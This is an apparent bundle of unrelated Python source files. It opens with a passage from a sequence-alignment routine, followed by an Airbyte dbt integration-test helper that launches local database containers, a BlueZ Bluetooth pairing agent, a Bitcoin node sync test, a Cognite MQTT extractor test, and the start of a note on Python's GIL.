TASKS1 = [(self.executor.execute, (one_seqs_t[i], one_seqs_t[j], 0), (i,j)) for i in range(len(one_seqs_t)) for j in range(i+1,len(one_seqs_t))]
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for task in TASKS1:
task_queue.put(task)
# Start worker processes
for i in range(PROCESSES):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
# print('Unordered results:')
for i in range(len(TASKS1)):
temp = done_queue.get()
# print('temp: ', temp)
if self.mode == 'NW':
MSA_scores.iloc[temp[1][0], temp[1][1]] = temp[0].iloc[len(one_seqs_t[temp[1][0]]),len(one_seqs_t[temp[1][1]])]
elif self.mode == 'DTW':
MSA_scores.iloc[temp[1][0], temp[1][1]] = temp[0].iloc[len(one_seqs_t[temp[1][0]]) - 1,len(one_seqs_t[temp[1][1]]) - 1]
else:
print('mode error!')
for i in range(PROCESSES):
task_queue.put('STOP')
for i in range(len(one_seqs_t)):
for j in range(0,i+1):
MSA_scores.iloc[i,j] = np.nan
# print("MSA_scores:",MSA_scores)
MSA_index = [[] for i in range(len(one_seqs_t))]
for tt in range(len(one_seqs_t) - 1):
###merge
if self.mode == 'NW':
MSA_scores_min = MSA_scores[MSA_scores==MSA_scores.max().max()].dropna(axis=1, thresh=1).dropna(thresh=1)
elif self.mode == 'DTW':
MSA_scores_min = MSA_scores[MSA_scores==MSA_scores.min().min()].dropna(axis=1, thresh=1).dropna(thresh=1)
else:
print("mode error!")
MSA_scores_min_index = MSA_scores_min.index[0]
MSA_scores_min_columns = MSA_scores_min.columns[0]
# print("MSA_scores_min_index:",MSA_scores_min_index)
# print("MSA_scores_min_columns:",MSA_scores_min_columns)
score_t, s1_t, s2_t = self.executor.execute(one_seqs_t[MSA_scores_min_index], one_seqs_t[MSA_scores_min_columns], 1)
# print('s1_t: ',s1_t)
# print('s2_t: ',s2_t)
s1_list = []
q1 = Queue()
q1.put(MSA_scores_min_index)
while(q1.qsize() > 0):
temp_index = q1.get()
s1_list.append(temp_index)
for i in range(len(MSA_index[temp_index])):
q1.put(MSA_index[temp_index][i])
# print('s1_list: ',s1_list)
s2_list = []
q2 = Queue()
q2.put(MSA_scores_min_columns)
while(q2.qsize() > 0):
temp_index = q2.get()
s2_list.append(temp_index)
for i in range(len(MSA_index[temp_index])):
q2.put(MSA_index[temp_index][i])
# print('s2_list: ',s2_list)
for i in range(len(s1_t)):
if s1_t[i] == '_':
for j in s1_list:
one_seqs[j].insert(i,'_')
if s2_t[i] == '_':
for j in s2_list:
one_seqs[j].insert(i,'_')
# print('mended:')
# for i in (s1_list + s2_list):
# print(one_seqs[i])
sMerge = []
for i in range(len(s1_t)):
temp_list = [one_seqs[j][i] for j in (s1_list + s2_list)]
while('_' in temp_list):
temp_list.remove('_')
if len(temp_list) > 0:
sMerge.append('{:02x}'.format(int(np.mean([int(temp_list[j],16) for j in range(len(temp_list))]))))
# print('sMerge: ',sMerge)
MSA_index[MSA_scores_min_index].append(MSA_scores_min_columns)
one_seqs_t[MSA_scores_min_index] = sMerge
for i in range(MSA_scores_min_columns):
MSA_scores.iloc[i,MSA_scores_min_columns] = np.nan
for i in range(MSA_scores_min_columns+1,len(one_seqs_t)):
MSA_scores.iloc[MSA_scores_min_columns,i] = np.nan
for i in range(MSA_scores_min_index):
if np.isnan(MSA_scores.iloc[i,MSA_scores_min_index]):
continue
else:
score_t= self.executor.execute(one_seqs_t[i], one_seqs_t[MSA_scores_min_index], 0)
if self.mode == 'NW':
MSA_scores.iloc[i,MSA_scores_min_index] = score_t.iloc[len(one_seqs_t[i]),len(one_seqs_t[MSA_scores_min_index])]
elif self.mode == 'DTW':
MSA_scores.iloc[i,MSA_scores_min_index] = score_t.iloc[len(one_seqs_t[i])-1,len(one_seqs_t[MSA_scores_min_index])-1]
else:
print("mode error!")
for i in range(MSA_scores_min_index+1,len(one_seqs_t)):
if np.isnan(MSA_scores.iloc[MSA_scores_min_index,i]):
continue
else:
score_t= self.executor.execute(one_seqs_t[i], one_seqs_t[MSA_scores_min_index], 0)
if self.mode == 'NW':
MSA_scores.iloc[MSA_scores_min_index,i] = score_t.iloc[len(one_seqs_t[i]),len(one_seqs_t[MSA_scores_min_index])]
elif self.mode == 'DTW':
MSA_scores.iloc[MSA_scores_min_index,i] = score_t.iloc[len(one_seqs_t[i])-1,len(one_seqs_t[MSA_scores_min_index])-1]
else:
print("mode error!")
# print("MSA_scores-mended:",MSA_scores)
one_seqs = np.array(one_seqs)
new_two_seq = []
gap_num = 0
for i in range(len(one_seqs[0])):
temp_l = list(one_seqs[:,i])
_num = temp_l.count('_')
if _num > len(temp_l)*self.thetag:
gap_num += 1
continue
else:
while('_' in temp_l):
temp_l.remove('_')
new_two_seq.append('{:02x}'.format(int(round(np.mean([int(temp_l[j],16) for j in range(len(temp_l))])))))
if len(one_seqs)>=4:
if (gap_num >= len(one_seqs[0])*0.4) or (list(one_seqs[0]).count('_') >= len(one_seqs[0])*0.4) or (list(one_seqs[1]).count('_') >= len(one_seqs[1])*0.4):
new_two_seq_t = np.array(list(one_seqs[0]) + list(one_seqs[1]))
gap_pos = np.where(new_two_seq_t != '_')
new_two_seq = list(new_two_seq_t[gap_pos])
tmpseqs_pos = np.where(one_seqs[0] != '_')
tmpseqs = one_seqs[0][tmpseqs_pos]
if len(one_seqs[0]) >= 30:
new_two_seq = list(tmpseqs[:int(len(tmpseqs)/2 + random.choice([-1,0,1]))])
elif len(tmpseqs) < 3:
new_two_seq_t = np.array(list(one_seqs[0]) + list(one_seqs[1]))
gap_pos = np.where(new_two_seq_t != '_')
new_two_seq = list(new_two_seq_t[gap_pos])
else:
tmpseqs1 = tmpseqs[:int(len(tmpseqs)/2)]
tmpseqs2 = tmpseqs[int(len(tmpseqs)/2):]
tmpseqsscore = self.executor.execute(tmpseqs1, tmpseqs2, 0)
if self.mode == 'NW':
if tmpseqsscore.iloc[len(tmpseqs1),len(tmpseqs2)] >= len(tmpseqs)/2 * 0.6:
new_two_seq = list(tmpseqs1)
elif self.mode == 'DTW':
if tmpseqsscore.iloc[len(tmpseqs1)-1,len(tmpseqs2)-1] <= len(tmpseqs)/2 * 0.1:
new_two_seq = list(tmpseqs1)
else:
print('mode error')
return new_two_seq, one_seqs
|
dbt_integration_test.py
|
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import json
import os
import random
import re
import socket
import string
import subprocess
import sys
import threading
import time
from copy import copy
from typing import Any, Callable, Dict, List
from normalization.destination_type import DestinationType
from normalization.transform_catalog.transform import read_yaml_config, write_yaml_config
from normalization.transform_config.transform import TransformConfig
NORMALIZATION_TEST_TARGET = "NORMALIZATION_TEST_TARGET"
NORMALIZATION_TEST_MSSQL_DB_PORT = "NORMALIZATION_TEST_MSSQL_DB_PORT"
NORMALIZATION_TEST_MYSQL_DB_PORT = "NORMALIZATION_TEST_MYSQL_DB_PORT"
NORMALIZATION_TEST_POSTGRES_DB_PORT = "NORMALIZATION_TEST_POSTGRES_DB_PORT"
NORMALIZATION_TEST_CLICKHOUSE_DB_PORT = "NORMALIZATION_TEST_CLICKHOUSE_DB_PORT"
class DbtIntegrationTest(object):
def __init__(self):
self.target_schema = "test_normalization"
self.container_prefix = f"test_normalization_db_{self.random_string(3)}"
self.db_names = []
@staticmethod
def generate_random_string(prefix: str) -> str:
return prefix + DbtIntegrationTest.random_string(5)
@staticmethod
def random_string(length: int) -> str:
return "".join(random.choice(string.ascii_lowercase) for i in range(length))
def set_target_schema(self, target_schema: str):
self.target_schema = target_schema
def setup_db(self, destinations_to_test: List[str]):
if DestinationType.POSTGRES.value in destinations_to_test:
self.setup_postgres_db()
if DestinationType.MYSQL.value in destinations_to_test:
self.setup_mysql_db()
if DestinationType.MSSQL.value in destinations_to_test:
self.setup_mssql_db()
if DestinationType.CLICKHOUSE.value in destinations_to_test:
self.setup_clickhouse_db()
def setup_postgres_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_POSTGRES_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_POSTGRES_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"username": "integration-tests",
"password": "integration-tests",
"port": port,
"database": "postgres",
"schema": self.target_schema,
}
if start_db:
self.db_names.append("postgres")
print("Starting localhost postgres container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_postgres",
"-e",
f"POSTGRES_USER={config['username']}",
"-e",
f"POSTGRES_PASSWORD={config['password']}",
"-p",
f"{config['port']}:5432",
"-d",
"marcosmarxm/postgres-ssl:dev",
"-c",
"ssl=on",
"-c",
"ssl_cert_file=/var/lib/postgresql/server.crt",
"-c",
"ssl_key_file=/var/lib/postgresql/server.key",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for Postgres DB to start...15 sec")
time.sleep(15)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/postgres.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mysql_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_MYSQL_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_MYSQL_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "root",
"password": "",
}
if start_db:
self.db_names.append("mysql")
print("Starting localhost mysql container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mysql",
"-e",
"MYSQL_ALLOW_EMPTY_PASSWORD=yes",
"-e",
"MYSQL_INITDB_SKIP_TZINFO=yes",
"-e",
f"MYSQL_DATABASE={config['database']}",
"-p",
f"{config['port']}:3306",
"-d",
"mysql",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for MySQL DB to start...15 sec")
time.sleep(15)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mysql.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mssql_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_MSSQL_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_MSSQL_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"username": "SA",
"password": "MyStr0ngP@ssw0rd",
"port": port,
"database": self.target_schema,
"schema": self.target_schema,
}
if start_db:
self.db_names.append("mssql")
print("Starting localhost MS SQL Server container for tests")
command_start_container = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mssql",
"-h",
f"{self.container_prefix}_mssql",
"-e",
"ACCEPT_EULA='Y'",
"-e",
f"SA_PASSWORD='{config['password']}'",
"-e",
"MSSQL_PID='Standard'",
"-p",
f"{config['port']}:1433",
"-d",
"mcr.microsoft.com/mssql/server:2019-GA-ubuntu-16.04",
]
# cmds & parameters
cmd_start_container = " ".join(command_start_container)
wait_sec = 30
# run the docker container
print("Executing: ", cmd_start_container)
subprocess.check_call(cmd_start_container, shell=True)
# wait for service is available
print(f"....Waiting for MS SQL Server to start...{wait_sec} sec")
time.sleep(wait_sec)
# Run additional commands to prepare the table
command_create_db = [
"docker",
"exec",
f"{self.container_prefix}_mssql",
"/opt/mssql-tools/bin/sqlcmd",
"-S",
config["host"],
"-U",
config["username"],
"-P",
config["password"],
"-Q",
f"CREATE DATABASE [{config['database']}]",
]
# create test db
print("Executing: ", " ".join(command_create_db))
subprocess.call(command_create_db)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mssql.json", "w") as fh:
fh.write(json.dumps(config))
def setup_clickhouse_db(self):
"""
        The official ClickHouse JDBC driver uses HTTP port 8123, while the Python ClickHouse
        driver uses the native port 9000, so we need to open both ports for the destination
        connector and the dbt container respectively.
Ref: https://altinity.com/blog/2019/3/15/clickhouse-networking-part-1
"""
start_db = True
if os.getenv(NORMALIZATION_TEST_CLICKHOUSE_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_CLICKHOUSE_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "default",
"password": "",
"ssl": False,
}
if start_db:
self.db_names.append("clickhouse")
print("Starting localhost clickhouse container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_clickhouse",
"--ulimit",
"nofile=262144:262144",
"-p",
"9000:9000", # Python clickhouse driver use native port
"-p",
f"{config['port']}:8123", # clickhouse JDBC driver use HTTP port
"-d",
# so far, only the latest version ClickHouse server image turned on
# window functions
"clickhouse/clickhouse-server:latest",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for ClickHouse DB to start...15 sec")
time.sleep(15)
# Run additional commands to prepare the table
command_create_db = [
"docker",
"run",
"--rm",
"--link",
f"{self.container_prefix}_clickhouse:clickhouse-server",
"clickhouse/clickhouse-client:21.8.10.19",
"--host",
"clickhouse-server",
"--query",
f"CREATE DATABASE IF NOT EXISTS {config['database']}",
]
# create test db
print("Executing: ", " ".join(command_create_db))
subprocess.call(command_create_db)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/clickhouse.json", "w") as fh:
fh.write(json.dumps(config))
@staticmethod
def find_free_port():
"""
Find an unused port to create a database listening on localhost to run destination-postgres
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
addr = s.getsockname()
s.close()
return addr[1]
def tear_down_db(self):
for db_name in self.db_names:
print(f"Stopping localhost {db_name} container for tests")
try:
subprocess.call(["docker", "kill", f"{self.container_prefix}_{db_name}"])
except Exception as e:
print(f"WARN: Exception while shutting down {db_name}: {e}")
@staticmethod
def change_current_test_dir(request):
# This makes the test run whether it is executed from the tests folder (with pytest/gradle)
# or from the base-normalization folder (through pycharm)
integration_tests_dir = os.path.join(request.fspath.dirname, "integration_tests")
if os.path.exists(integration_tests_dir):
os.chdir(integration_tests_dir)
else:
os.chdir(request.fspath.dirname)
def generate_profile_yaml_file(
self, destination_type: DestinationType, test_root_dir: str, random_schema: bool = False
) -> Dict[str, Any]:
"""
        Each destination requires different settings to connect to. This step generates the appropriate profiles.yml
as described here: https://docs.getdbt.com/reference/profiles.yml
"""
config_generator = TransformConfig()
profiles_config = config_generator.read_json_config(f"../secrets/{destination_type.value.lower()}.json")
# Adapt credential file to look like destination config.json
if destination_type.value == DestinationType.BIGQUERY.value:
credentials = profiles_config["basic_bigquery_config"]
profiles_config = {
"credentials_json": json.dumps(credentials),
"dataset_id": self.target_schema,
"project_id": credentials["project_id"],
}
elif destination_type.value == DestinationType.MYSQL.value:
profiles_config["database"] = self.target_schema
elif destination_type.value == DestinationType.REDSHIFT.value:
profiles_config["schema"] = self.target_schema
if random_schema:
profiles_config["schema"] = self.target_schema + "_" + "".join(random.choices(string.ascii_lowercase, k=5))
else:
profiles_config["schema"] = self.target_schema
if destination_type.value == DestinationType.CLICKHOUSE.value:
# Python ClickHouse driver uses native port 9000, which is different
# from official ClickHouse JDBC driver
clickhouse_config = copy(profiles_config)
clickhouse_config["port"] = 9000
profiles_yaml = config_generator.transform(destination_type, clickhouse_config)
else:
profiles_yaml = config_generator.transform(destination_type, profiles_config)
config_generator.write_yaml_config(test_root_dir, profiles_yaml, "profiles.yml")
return profiles_config
@staticmethod
def run_destination_process(message_file: str, test_root_dir: str, commands: List[str]):
print("Executing: ", " ".join(commands))
with open(os.path.join(test_root_dir, "destination_output.log"), "ab") as f:
process = subprocess.Popen(commands, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def writer():
if os.path.exists(message_file):
with open(message_file, "rb") as input_data:
while True:
line = input_data.readline()
if not line:
break
process.stdin.write(line)
process.stdin.close()
thread = threading.Thread(target=writer)
thread.start()
for line in iter(process.stdout.readline, b""):
f.write(line)
sys.stdout.write(line.decode("utf-8"))
thread.join()
process.wait()
return process.returncode == 0
@staticmethod
def get_normalization_image(destination_type: DestinationType) -> str:
if DestinationType.MSSQL.value == destination_type.value:
return "airbyte/normalization-mssql:dev"
elif DestinationType.MYSQL.value == destination_type.value:
return "airbyte/normalization-mysql:dev"
elif DestinationType.ORACLE.value == destination_type.value:
return "airbyte/normalization-oracle:dev"
elif DestinationType.CLICKHOUSE.value == destination_type.value:
return "airbyte/normalization-clickhouse:dev"
elif DestinationType.SNOWFLAKE.value == destination_type.value:
return "airbyte/normalization-snowflake:dev"
elif DestinationType.REDSHIFT.value == destination_type.value:
return "airbyte/normalization-redshift:dev"
else:
return "airbyte/normalization:dev"
def dbt_check(self, destination_type: DestinationType, test_root_dir: str):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
normalization_image: str = self.get_normalization_image(destination_type)
# Perform sanity check on dbt project settings
assert self.run_check_dbt_command(normalization_image, "debug", test_root_dir)
assert self.run_check_dbt_command(normalization_image, "deps", test_root_dir)
def dbt_run(self, destination_type: DestinationType, test_root_dir: str, force_full_refresh: bool = False):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
normalization_image: str = self.get_normalization_image(destination_type)
# Compile dbt models files into destination sql dialect, then run the transformation queries
assert self.run_check_dbt_command(normalization_image, "run", test_root_dir, force_full_refresh)
@staticmethod
def run_check_dbt_command(normalization_image: str, command: str, cwd: str, force_full_refresh: bool = False) -> bool:
"""
        Run the dbt subprocess while checking for and counting "ERROR", "FAIL" or "WARNING" lines printed in its output
"""
if normalization_image.startswith("airbyte/normalization-oracle") or normalization_image.startswith("airbyte/normalization-mysql"):
dbtAdditionalArgs = []
else:
dbtAdditionalArgs = ["--event-buffer-size=10000"]
error_count = 0
commands = (
[
"docker",
"run",
"--rm",
"--init",
"-v",
f"{cwd}:/workspace",
"-v",
f"{cwd}/build:/build",
"-v",
f"{cwd}/logs:/logs",
"-v",
f"{cwd}/build/dbt_packages:/dbt",
"--network",
"host",
"--entrypoint",
"/usr/local/bin/dbt",
"-i",
normalization_image,
]
+ dbtAdditionalArgs
+ [
command,
"--profiles-dir=/workspace",
"--project-dir=/workspace",
]
)
if force_full_refresh:
commands.append("--full-refresh")
command = f"{command} --full-refresh"
print("Executing: ", " ".join(commands))
print(f"Equivalent to: dbt {command} --profiles-dir={cwd} --project-dir={cwd}")
with open(os.path.join(cwd, "dbt_output.log"), "ab") as f:
process = subprocess.Popen(commands, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=os.environ)
for line in iter(lambda: process.stdout.readline(), b""):
f.write(line)
str_line = line.decode("utf-8")
sys.stdout.write(str_line)
# keywords to match lines as signaling errors
if "ERROR" in str_line or "FAIL" in str_line or "WARNING" in str_line:
# exception keywords in lines to ignore as errors (such as summary or expected warnings)
is_exception = False
for except_clause in [
"Done.", # DBT Summary
"PASS=", # DBT Summary
"Nothing to do.", # When no schema/data tests are setup
"Configuration paths exist in your dbt_project.yml", # When no cte / view are generated
"Error loading config file: .dockercfg: $HOME is not defined", # ignore warning
"depends on a node named 'disabled_test' which was not found", # Tests throwing warning because it is disabled
"The requested image's platform (linux/amd64) does not match the detected host platform "
+ "(linux/arm64/v8) and no specific platform was requested", # temporary patch until we publish images for arm64
]:
if except_clause in str_line:
is_exception = True
break
if not is_exception:
# count lines signaling an error/failure/warning
error_count += 1
process.wait()
message = (
f"{' '.join(commands)}\n\tterminated with return code {process.returncode} "
f"with {error_count} 'Error/Warning/Fail' mention(s)."
)
print(message)
assert error_count == 0, message
assert process.returncode == 0, message
if error_count > 0:
return False
return process.returncode == 0
@staticmethod
def copy_replace(src, dst, pattern=None, replace_value=None):
"""
Copies a file from src to dst replacing pattern by replace_value
Parameters
----------
src : string
Path to the source filename to copy from
dst : string
Path to the output filename to copy to
pattern
list of Patterns to replace inside the src file
replace_value
list of Values to replace by in the dst file
"""
file1 = open(src, "r") if isinstance(src, str) else src
file2 = open(dst, "w") if isinstance(dst, str) else dst
pattern = [pattern] if isinstance(pattern, str) else pattern
replace_value = [replace_value] if isinstance(replace_value, str) else replace_value
if replace_value and pattern:
if len(replace_value) != len(pattern):
raise Exception("Invalid parameters: pattern and replace_value" " have different sizes.")
rules = [(re.compile(regex, re.IGNORECASE), value) for regex, value in zip(pattern, replace_value)]
else:
rules = []
for line in file1:
if rules:
for rule in rules:
line = re.sub(rule[0], rule[1], line)
file2.write(line)
if isinstance(src, str):
file1.close()
if isinstance(dst, str):
file2.close()
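    # Illustrative usage sketch for copy_replace (the file names and the placeholder pattern below are
    # hypothetical and not part of this test suite): copy a profile template while substituting a schema.
    #
    #   DbtIntegrationTest.copy_replace(
    #       "profiles_template.yml",              # hypothetical source file
    #       "profiles.yml",                       # hypothetical destination file
    #       pattern=[r"\{\{ *schema *\}\}"],      # regex pattern(s) to substitute
    #       replace_value=["test_normalization"],
    #   )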
@staticmethod
def get_test_targets() -> List[str]:
"""
Returns a list of destinations to run tests on.
        If the environment variable NORMALIZATION_TEST_TARGET is set to a comma-separated list of destination names,
        then the tests are run only on that subset of destinations.
Otherwise tests are run against all destinations
"""
if os.getenv(NORMALIZATION_TEST_TARGET):
target_str = os.getenv(NORMALIZATION_TEST_TARGET)
return [d.value for d in {DestinationType.from_string(s.strip()) for s in target_str.split(",")}]
else:
return [d.value for d in DestinationType]
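    # Illustrative usage sketch (the destination names and pytest invocation below are assumptions,
    # not taken from this repository): with the variable set, get_test_targets() returns only that subset.
    #
    #   NORMALIZATION_TEST_TARGET="postgres,mysql" pytest integration_tests/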
@staticmethod
def update_yaml_file(filename: str, callback: Callable):
config = read_yaml_config(filename)
updated, config = callback(config)
if updated:
write_yaml_config(config, filename)
|
agent.py
|
import logging
import threading
import dbus
import dbus.service
from gi.repository import GLib
from .notify import Notify
AGENT_INTERFACE = "org.bluez.Agent1"
DEVICE_INTERFACE = "org.bluez.Device1"
class Device:
def __init__(self, bus: dbus.SystemBus, device):
self._device = dbus.Interface(
bus.get_object("org.bluez", device), "org.freedesktop.DBus.Properties"
)
@property
def trusted(self) -> bool:
return self._device.Get(DEVICE_INTERFACE, "Trusted")
@trusted.setter
def trusted(self, trust: bool):
self._device.Set(DEVICE_INTERFACE, "Trusted", trust)
@property
def alias(self) -> str:
return self._device.Get(DEVICE_INTERFACE, "Alias")
class Rejected(dbus.DBusException):
_dbus_error_name = "org.bluez.Error.Rejected"
class Agent(dbus.service.Object):
def __init__(
self,
bus: dbus.SystemBus,
path: str = "/bot/agent",
capability: str = "DisplayOnly",
):
self._bus = bus
self._path = path
self._blocking_io = None
self._mainloop = None
self._capability = capability
self._logger = logging.getLogger(__name__)
self._logger.setLevel(logging.INFO)
super().__init__(self._bus, path)
def start(self, blocking_io: Notify):
self._blocking_io = blocking_io
self._mainloop = GLib.MainLoop()
manager = dbus.Interface(
self._bus.get_object("org.bluez", "/org/bluez"), "org.bluez.AgentManager1"
)
manager.RegisterAgent(self._path, self._capability)
self._logger.info("Agent registered")
manager.RequestDefaultAgent(self._path)
manager_thread = threading.Thread(target=self._mainloop.run)
manager_thread.start()
def stop(self):
self._mainloop.quit()
exit_on_release = True
@property
def set_exit_on_release(self):
return self.exit_on_release
@set_exit_on_release.setter
def set_exit_on_release(self, exit_on_release):
self.exit_on_release = exit_on_release
@dbus.service.method(AGENT_INTERFACE, in_signature="", out_signature="")
def Release(self):
self._logger.info("Release")
if self.exit_on_release:
self._mainloop.quit()
@dbus.service.method(AGENT_INTERFACE, in_signature="os", out_signature="")
def AuthorizeService(self, device, uuid):
device = Device(self._bus, device)
print(f"AuthorizeService ({device.alias}, {uuid})")
authorize = input("Authorize connection (yes/no): ")
if authorize == "yes":
return
raise Rejected("Connection rejected by user")
@dbus.service.method(AGENT_INTERFACE, in_signature="o", out_signature="s")
def RequestPinCode(self, device):
device = Device(self._bus, device)
print(f"RequestPinCode {device.alias}")
device.trusted = True
return input("Enter PIN Code: ")
@dbus.service.method(AGENT_INTERFACE, in_signature="o", out_signature="u")
def RequestPasskey(self, device):
device = Device(self._bus, device)
print(f"RequestPasskey {device.alias}")
device.trusted = True
passkey = input("Enter passkey: ")
return dbus.UInt32(passkey)
@dbus.service.method(AGENT_INTERFACE, in_signature="ouq", out_signature="")
def DisplayPasskey(self, device, passkey, entered):
device = Device(self._bus, device)
self._logger.info(
f"DisplayPasskey ({device.alias}, {passkey} entered {entered})"
)
@dbus.service.method(AGENT_INTERFACE, in_signature="os", out_signature="")
def DisplayPinCode(self, device, pincode):
device = Device(self._bus, device)
self._logger.info(f"DisplayPinCode {device.alias} {pincode}")
@dbus.service.method(AGENT_INTERFACE, in_signature="ou", out_signature="")
def RequestConfirmation(self, device, pin):
device = Device(self._bus, device)
confirm = self._blocking_io.confirm_message(device.alias)
if confirm:
device.trusted = True
self._blocking_io.accepted(device.alias)
return
self._blocking_io.rejected(device.alias)
raise Rejected("Passkey doesn't match")
@dbus.service.method(AGENT_INTERFACE, in_signature="o", out_signature="")
def RequestAuthorization(self, device):
device = Device(self._bus, device)
print(f"RequestAuthorization {device.alias}")
auth = input("Authorize? (yes/no): ")
if auth == "yes":
return
raise Rejected("Pairing rejected")
@dbus.service.method(AGENT_INTERFACE, in_signature="", out_signature="")
def Cancel(self):
self._logger.info("Cancel")
|
sync.py
|
#!/usr/bin/env python3
# Copyright (c) 2014 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test sync
#
from test_framework import BitcoinTestFramework
from authproxy import AuthServiceProxy, JSONRPCException
from util import *
import os
import shutil
import random
from threading import Thread
from queue import Queue
def mineSingleBlock(miningQueue):
while not miningQueue.empty():
taskObject = miningQueue.get()
taskCompleted = False
nodeToWorkOn = taskObject[0]
blockCount = taskObject[1]
while not taskCompleted:
try:
if blockCount > 0:
nodeToWorkOn.setgenerate(True,1)
blockCount -= 1
else:
taskCompleted = True
miningQueue.task_done()
except Exception as e:
# This exception is due to a failure to mine this specific block
dummyExceptionHandling = str(e)
return True
class SyncTest(BitcoinTestFramework):
def run_test(self):
        # Mine 51 blocks by asking randomly chosen nodes
nodeIdsToGenerateNextBlock = [random.randrange(len(self.nodes)) for j in range(51)]
numberOfBlocksPerNode = {i: nodeIdsToGenerateNextBlock.count(i) for i in nodeIdsToGenerateNextBlock}
        nodeMiningQueues = [Queue() for _ in range(len(self.nodes))]  # one independent queue per node
for nodeId in range(len(self.nodes)):
            nodeMiningQueues[nodeId].put((self.nodes[nodeId], numberOfBlocksPerNode.get(nodeId, 0)))
for nodeThreadIndex in range(len(self.nodes)):
worker = Thread(target=mineSingleBlock,args=[nodeMiningQueues[nodeThreadIndex]] )
            worker.daemon = True
worker.start()
for qObj in nodeMiningQueues:
qObj.join()
sync_blocks(self.nodes)
self.nodes[1].setgenerate(True, 50)
sync_blocks(self.nodes)
bestBlockHash = self.nodes[0].getbestblockhash()
print("Block count totals {}".format(self.nodes[0].getblockcount()) )
        for node in self.nodes[1:]:  # compare every other node against node 0
assert_equal(node.getbestblockhash() , bestBlockHash)
if __name__ == '__main__':
SyncTest().main()
|
test_extractor.py
|
# Copyright 2022 Cognite AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import math
import random
import threading
import time
import unittest
from dataclasses import dataclass
from typing import Optional
from cognite.extractorutils.throttle import throttled_loop
from cognite.extractorutils.uploader_types import InsertDatapoints
from cognite.extractorutils.mqtt.extractor import MqttExtractor
@dataclass
class RawDatapoint:
id: Optional[str]
timestamp: Optional[float]
value: Optional[float]
test_id = random.randint(0, 2 ** 31)
class IntegrationTests(unittest.TestCase):
ts_1: str = f"mqtt_util_integration_ts_test_1-{test_id}"
def setUp(self) -> None:
self.event = threading.Event()
self.extractor = MqttExtractor(
name="test_mqtt_extractor",
description="Test mqtt extractor",
version="1.0.0",
cancelation_token=self.event,
override_path="config_test.yml",
)
self.extractor._upload_interval = 1
def tearDown(self) -> None:
self.extractor.cognite_client.time_series.delete(external_id=self.ts_1, ignore_unknown_ids=True)
self.mqttClient.loop_stop()
def test_ts_extraction(self) -> None:
@self.extractor.topic(topic="ts-topic-1", qos=1, response_type=RawDatapoint)
def handle_ts(dp: RawDatapoint) -> None:
return InsertDatapoints(external_id=dp.id, datapoints=[(dp.timestamp, dp.value)])
def run_loop() -> None:
iter = 0
self.mqttClient = self.extractor._create_mqtt_client("integration-test-publisher")
self.mqttClient.connect_async(
self.extractor.config.source.host,
self.extractor.config.source.port,
self.extractor.config.source.keep_alive,
)
self.mqttClient.loop_start()
for _ in throttled_loop(1, self.event):
raw_data = json.dumps(
{"id": self.ts_1, "value": math.sin(time.time() / 10), "timestamp": time.time() * 1000}
)
self.mqttClient.publish("ts-topic-1", raw_data, 1)
try:
points = self.extractor.cognite_client.datapoints.retrieve(
external_id=self.ts_1, start="1w-ago", end="now", limit=None, ignore_unknown_ids=True
)
if points is not None and points.count > 1:
self.event.set()
else:
iter += 1
if iter > 5:
self.event.set()
                except Exception:
self.event.set()
self.mqttClient.loop_stop()
thread = threading.Thread(target=run_loop, name="publish-loop")
with self.extractor:
thread.start()
self.extractor.run()
thread.join()
points = self.extractor.cognite_client.datapoints.retrieve(
external_id=self.ts_1, start="1w-ago", end="now", limit=None, ignore_unknown_ids=True
)
assert points is not None and len(points.value) > 0
|
cache.py
|
'''
# The GIL (Global Interpreter Lock)
Essentially it behaves like an operating-system mutex.
1. CPython introduced the GIL for two main reasons:
   - to sidestep complex race conditions in areas such as memory management;
   - CPython relies heavily on C libraries, and most of them are not natively thread-safe
     (making them thread-safe would cost performance and add complexity).
2. How the GIL works
